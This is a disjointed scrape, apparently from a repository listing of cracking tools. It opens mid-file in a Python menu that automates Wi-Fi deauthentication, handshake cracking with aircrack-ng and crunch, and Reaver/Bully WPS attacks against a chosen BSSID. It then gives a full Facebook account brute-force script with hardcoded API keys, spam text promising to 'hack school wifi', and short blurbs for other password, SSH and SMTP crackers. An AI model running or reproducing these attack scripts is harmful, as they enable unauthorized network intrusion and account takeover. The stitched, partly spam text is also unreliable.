| xterm -e aireplay-ng -0 {} -a {} {}".format(interface,bssid,channel,path,dist,bssid,interface) geny = os.system(order) intro() elif var == 5 : def wire(): cmd = os.system("clear") print(""" 1) Aircrack-ng 17) kalibrate-rtl 2) Asleap 18) KillerBee 3) Bluelog 19) Kismet 4) BlueMaho 20) mdk3 5) Bluepot 21) mfcuk 6) BlueRanger 22) mfoc 7) Bluesnarfer 23) mfterm 8) Bully 24) Multimon-NG 9) coWPAtty 25) PixieWPS 10) crackle 26) Reaver 11) eapmd5pass 27) redfang 12) Fern Wifi Cracker 28) RTLSDR Scanner 13) Ghost Phisher 29) Spooftooph 14) GISKismet 30) Wifi Honey 15) Wifitap 31) gr-scan 16) Wifite 32) Back to main menu 90) airgeddon 91) wifite v2 0)install all wireless tools """) w = int(input("Enter The number of the tool : >>> ")) if w == 1 : cmd = os.system("sudo apt-get update && apt-get install aircrack-ng") elif w == 90: print("sudo apt-get update && apt-get install git && git clone https://github.com/v1s1t0r1sh3r3/airgeddon.git") elif w == 91: print("sudo apt-get update && apt-get install git && git clone https://github.com/derv82/wifite2.git") elif w == 2 : cmd = os.system("sudo apt-get update && apt-get install asleep") elif w == 3 : cmd = os.system("sudo apt-get update && apt-get install bluelog") elif w == 4 : cmd = os.system("sudo apt-get update && apt-get install bluemaho") elif w == 5 : cmd = os.system("sudo apt-get update && apt-get install bluepot") elif w == 6 : cmd = os.system("sudo apt-get update && apt-get install blueranger") elif w == 7 : cmd = os.system("sudo apt-get update && apt-get install bluesnarfer") elif w == 8 : cmd = os.system("sudo apt-get update && apt-get install bully") elif w == 9 : cmd = os.system("sudo apt-get update && apt-get install cowpatty") elif w == 10 : cmd = os.system("sudo apt-get update && apt-get install crackle") elif w == 11 : cmd = os.system("sudo apt-get update && apt-get install eapmd5pass") elif w == 12 : cmd = os.system("sudo apt-get update && apt-get install fern-wifi-cracker") elif w == 13 : cmd = os.system("sudo apt-get update && apt-get install ghost-phisher") elif w == 14 : cmd = os.system("sudo apt-get update && apt-get install giskismet") elif w == 15 : cmd = os.system("apt-get install git && git clone git://git.kali.org/packages/gr-scan.git") elif w == 16 : cmd = os.system("sudo apt-get update && apt-get install kalibrate-rtl") elif w == 17 : cmd = os.system("sudo apt-get update && apt-get install killerbee-ng") elif w == 18 : cmd = os.system("sudo apt-get update && apt-get install kismet") elif w == 19 : cmd = os.system("sudo apt-get update && apt-get install mdk3") elif w == 20 : cmd = os.system("sudo apt-get update && apt-get install mfcuk") elif w == 21 : cmd = os.system("sudo apt-get update && apt-get install mfoc") elif w == 22 : cmd = os.system("sudo apt-get update && apt-get install mfterm") elif w == 23 : cmd = os.system("sudo apt-get update && apt-get install multimon-ng") elif w == 24 : cmd = os.system("sudo apt-get update && apt-get install pixiewps") elif w == 25 : cmd = os.system("sudo apt-get update && apt-get install reaver") elif w == 26 : cmd = os.system("sudo apt-get update && apt-get install redfang") elif w == 27 : cmd = os.system("sudo apt-get update && apt-get install rtlsdr-scanner") elif w == 28 : cmd = os.system("sudo apt-get update && apt-get install spooftooph") elif w == 29 : cmd = os.system("sudo apt-get update && apt-get install wifi-honey") elif w == 30 : cmd = os.system("sudo apt-get update && apt-get install wifitap") elif w == 31 : cmd = os.system("sudo apt-get update && apt-get install wifite") elif w == 32 : intro() elif w == 0 : cmd = os.system("apt-get install -y aircrack-ng asleap bluelog blueranger bluesnarfer bully cowpatty crackle eapmd5pass fern-wifi-cracker ghost-phisher giskismet gqrx kalibrate-rtl killerbee kismet mdk3 mfcuk mfoc mfterm multimon-ng pixiewps reaver redfang spooftooph wifi-honey wifitap wifite") else: print("Not Found") wire() wire() elif var == 0 : cmd = os.system("clear") print(""" Hi. My Name is joker_squad from India the mother of the world you find on Facebook https://www.facebook.com/salman.musb.5 contack me 8528462956 pease """) quit() elif var == 00: exit() elif var == 6: if os.path.exists("/usr/share/wordlists/rockyou.txt")==True: print("\nEnter the path of the handshake file ?") path = str(input("")) order = "aircrack-ng {} -w /usr/share/wordlists/rockyou.txt".format(path) print("\nTo exit Press CTRL +C") geny = os.system(order) sleep = os.system("sleep 3d") exit() elif os.path.exists("/usr/share/wordlists/rockyou.txt")==False: cmd = os.system("gzip -d /usr/share/wordlists/rockyou.txt.gz") print("\nEnter the path of the handshake file ?") path = str(input("")) order = "aircrack-ng {} -w /usr/share/wordlists/rockyou.txt".format(path) print("\nTo exit Press CTRL +C") geny = os.system(order) sleep = os.system("sleep 3d") exit() elif var == 7 : print("\nEnter the path of the handshake file ?") path = str(input("")) print("\nEnter the path of the wordlist ?") wordlist = str(input("")) order = ("aircrack-ng {} -w {}").format(path,wordlist) geny = os.system(order) exit() elif var == 8 : print("\nEnter the essid of the network ?(Be careful when you type it and use 'the name of the network') ") essid = str(input("")) print("\nEnter the path of the handshake file ?") path = str(input("")) print("\nEnter the minimum length of the password (8/64)?") mini = int(input("")) print("\nEnter the maximum length of the password (8/64)?") max = int(input("")) print(""" --------------------------------------------------------------------------------------- (1) Lowercase chars (abcdefghijklmnopqrstuvwxyz) (2) Uppercase chars (ABCDEFGHIJKLMNOPQRSTUVWXYZ) (3) Numeric chars (0123456789) (4) Symbol chars (!#$%/=?{}[]-*:;) (5) Lowercase + uppercase chars (abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ) (6) Lowercase + numeric chars (abcdefghijklmnopqrstuvwxyz0123456789) (7) Uppercase + numeric chars (ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789) (8) Symbol + numeric chars (!#$%/=?{}[]-*:;0123456789) (9) Lowercase + uppercase + numeric chars (abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789) (10) Lowercase + uppercase + symbol chars (abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ!#$%/=?{}[]-*:;) (11) Lowercase + uppercase + numeric + symbol chars (abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!#$%/=?{}[]-*:;) (12) Your Own Words and numbers ----------------------------------------------------------------------------------------- Crack Password Could Take Hours,Days,Weeks,Months to complete and the speed of cracking will reduce because you generate a Huge,Huge Passwordlist may reach to Hundreds of TeRa Bits so Be patiant """) print("\nEnter your choise here : ?") set = str(input("")) if set == "1": test = str("abcdefghijklmnopqrstuvwxyz") order = "crunch {} {} {} | aircrack-ng {} -e {} -w-".format(mini,max,test,path,essid) geny = os.system(order) elif set == "2": test = str("ABCDEFGHIJKLMNOPQRSTUVWXYZ") order = "crunch {} {} {} | aircrack-ng {} -e {} -w-".format(mini,max,test,path,essid) geny = os.system(order) elif set == "3": test = str("0123456789") order = "crunch {} {} {} | aircrack-ng {} -e {} -w-".format(mini,max,test,path,essid) geny = os.system(order) elif set == "4": test = str("!#$%/=?{}[]-*:;") order = "crunch {} {} {} | aircrack-ng {} -e {} -w-".format(mini,max,test,path,essid) geny = os.system(order) elif set == "5": test = str("abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ") order = "crunch {} {} {} | aircrack-ng {} -e {} -w-".format(mini,max,test,path,essid) geny = os.system(order) elif set == "6": test = str("abcdefghijklmnopqrstuvwxyz0123456789") order = "crunch {} {} {} | aircrack-ng {} -e {} -w-".format(mini,max,test,path,essid) geny = os.system(order) elif set == "7": test = str("ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789") order = "crunch {} {} {} | aircrack-ng {} -e {} -w-".format(mini,max,test,path,essid) geny = os.system(order) elif set == "8": test = str("!#$%/=?{}[]-*:;0123456789") order = "crunch {} {} {} | aircrack-ng {} -e {} -w-".format(mini,max,test,path,essid) geny = os.system(order) elif set == "9": test = str("abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789") order = "crunch {} {} {} | aircrack-ng {} -e {} -w-".format(mini,max,test,path,essid) geny = os.system(order) elif set == "10": test = str("abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ!#$%/=?{}[]-*:;") order = "crunch {} {} {} | aircrack-ng {} -e {} -w-".format(mini,max,test,path,essid) geny = os.system(order) elif set == "11": test = str("abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!#$%/=?{}[]-*:;") order = "crunch {} {} {} | aircrack-ng {} -e {} -w-".format(mini,max,test,path,essid) geny = os.system(order) elif set == "12": print("Enter you Own Words and numbers") test = str(input("")) order = "crunch {} {} {} | aircrack-ng {} -e {} -w-".format(mini,max,test,path,essid) geny = os.system(order) else: print("\nNot Found") intro() print("Copy the Password and Close the tool") cmd5 = os.system("sleep 3d") elif var == 9 : print("\nEnter the minimum length of the password (8/64)?") mini = int(input("")) print("\nEnter the maximum length of the password (8/64)?") max = int(input("")) print("\nEnter the path of the output file?") path = str(input("")) print("\nEnter what you want the password contain ?") password = str(input("")) order = ("crunch {} {} {} -o {}").format(mini,max,password,path) geny = os.system(order) a = ("The wordlist in >>>>> {} Named as SRART").format(path) print(a) elif var == 10: cmd = os.system("clear") print(""" 1)Reaver 2)Bully 3)wifite (Recommeneded) 4)PixieWps 0) Back to Main Menu """) print("Choose the kind of the attack ?") attack = int(input("")) if attack == 1: print("\nEnter the interface to start ?(Default(Wlan0mon/Wlan1mon))") interface = str(input("")) print("\nEnter the bssid of the network ?") bssid = str(input("")) order = ("reaver -i {} -b {} -vv").format(interface,bssid) geny = os.system(order) intro() elif attack == 2: print("\nEnter the interface to start ?(Default(Wlan0mon/Wlan1mon)") interface = str(input("")) print("\nEnter the bssid of the network ?") bssid = str(input("")) print("\nEnter the channel of the network ?") channel = int(input("")) order = ("bully -b {} -c {} --pixiewps {}").format(bssid,channel,interface) geny = os.system(order) intro() elif attack == 3: cmd = os.system("wifite") intro() elif attack == 4: print("\nEnter the interface to start ?(Default(Wlan0mon/Wlan1mon)") interface = str(input("")) print("\nEnter the bssid of the network ?") bssid = str(input("")) order = ("reaver -i {} -b {} -K").format(interface,bssid) geny = os.system(order) intro() elif attack == 0 : intro() elif var == 11: print("\nEnter the interface to start ?(Default(Wlan0mon/Wlan1mon)") interface = str(input("")) order = "airodump-ng -M --wps {}".format(interface) geny = os.system(order) cmd = os.system("sleep 5 ") intro() else: print("Not Found") cmd = os.system("sleep 2") intro() intro()
RdH4CK3r
ute.py - Facebook Brute Force # -*- coding: utf-8 -*- ## import os import sys import urllib import hashlib API_SECRET = "62f8ce9f74b12f84c123cc23437a4a32" __banner__ = """ +=======================================+ |..........Facebook Cracker v 1.........| +---------------------------------------+ |#Author: DedSecTL <dtlily> | |#Contact: Telegram @dtlily | |#Date: Fri Feb 8 10:15:49 2019 | |#This tool is made for pentesting. | |#Changing the description of this tool | |Won't made you the coder !!! | |#Respect Coderz | |#I take no responsibilities for the | | use of this program ! | +=======================================+ |..........Facebook Cracker v 1.........| +---------------------------------------+ """ print("[+] Facebook Brute Force\n") userid = raw_input("[*] Enter [Email|Phone|Username|ID]: ") try: passlist = raw_input("[*] Set PATH to passlist: ") if os.path.exists(passlist) != False: print(__banner__) print(" [+] Account to crack : {}".format(userid)) print(" [+] Loaded : {}".format(len(open(passlist,"r").read().split("\n")))) print(" [+] Cracking, please wait ...") for passwd in open(passlist,'r').readlines(): sys.stdout.write(u"\u001b[1000D[*] Trying {}".format(passwd.strip())) sys.stdout.flush() sig = "api_key=882a8490361da98702bf97a021ddc14dcredentials_type=passwordemail={}format=JSONgenerate_machine_id=1generate_session_cookies=1locale=en_USmethod=auth.loginpassword={}return_ssl_resources=0v=1.0{}".format(userid,passwd.strip(),API_SECRET) xx = hashlib.md5(sig).hexdigest() data = "api_key=882a8490361da98702bf97a021ddc14d&credentials_type=password&email={}&format=JSON&generate_machine_id=1&generate_session_cookies=1&locale=en_US&method=auth.login&password={}&return_ssl_resources=0&v=1.0&sig={}".format(userid,passwd.strip(),xx) response = urllib.urlopen("https://api.facebook.com/restserver.php?{}".format(data)).read() if "error" in response: pass else: print("\n\n[+] Password found .. !!") print("\n[+] Password : {}".format(passwd.strip())) break print("\n\n[!] Done .. !!") else: print("fbbrute: error: No such file or directory") except KeyboardInterrupt:
huong874
wifi cracker wlan cracker hack school wifi 🔥 working 2024 🔥 automatic wifi cracker. uses airodump, aircrack, aireplay. wifi cracker wifi cracker tool wifi cracking tool wlan cracker wifi cracker wifi cracker tool wifi cracking tool wlan cracker wifi cracker wifi cracker tool wifi cracking tool wlan cracker wifi cracker wifi crackerbqlenwaqu
SagarBiswas-MultiHAT
HashAttackDemos — An educational Python toolkit demonstrating secure password hashing (Argon2id, bcrypt, scrypt) and common failure modes (MD5, rainbow tables). Includes reusable library hash_password_cracker, attack demos (dictionary/rainbow/hybrid), CLI tools, and unit tests — for defensive learning on data you own or are authorized to test.
vishalpatil1337
Using Microsoft Office Password Cracker tool we can unlock any Microsoft Office file.This tool is using john tool. wordlist generator is also included with python script.
Anirudh1103
This tool contains several features like Encryption, Decryption, Wifi password extractor, Zip file password cracker, Password. I'm currently working on this project and I will complete it soon.
viehgroup
The_Scripter is tools for making pentesting easy. It contains lots of automation scripts like hash cracker, ssh_cracker,etc.
MrHacker46
M0B tool v2 : exploit - brute force - website informations gathering - dork scanner with 9 search engines - full ip ports scanner - shell/cp cracker script finder/hacked index finder/detecter
Aron-Tn
[NEW] : Simple Mail Transfer Protocol (SMTP) CHECKER - CRACKER Tool V5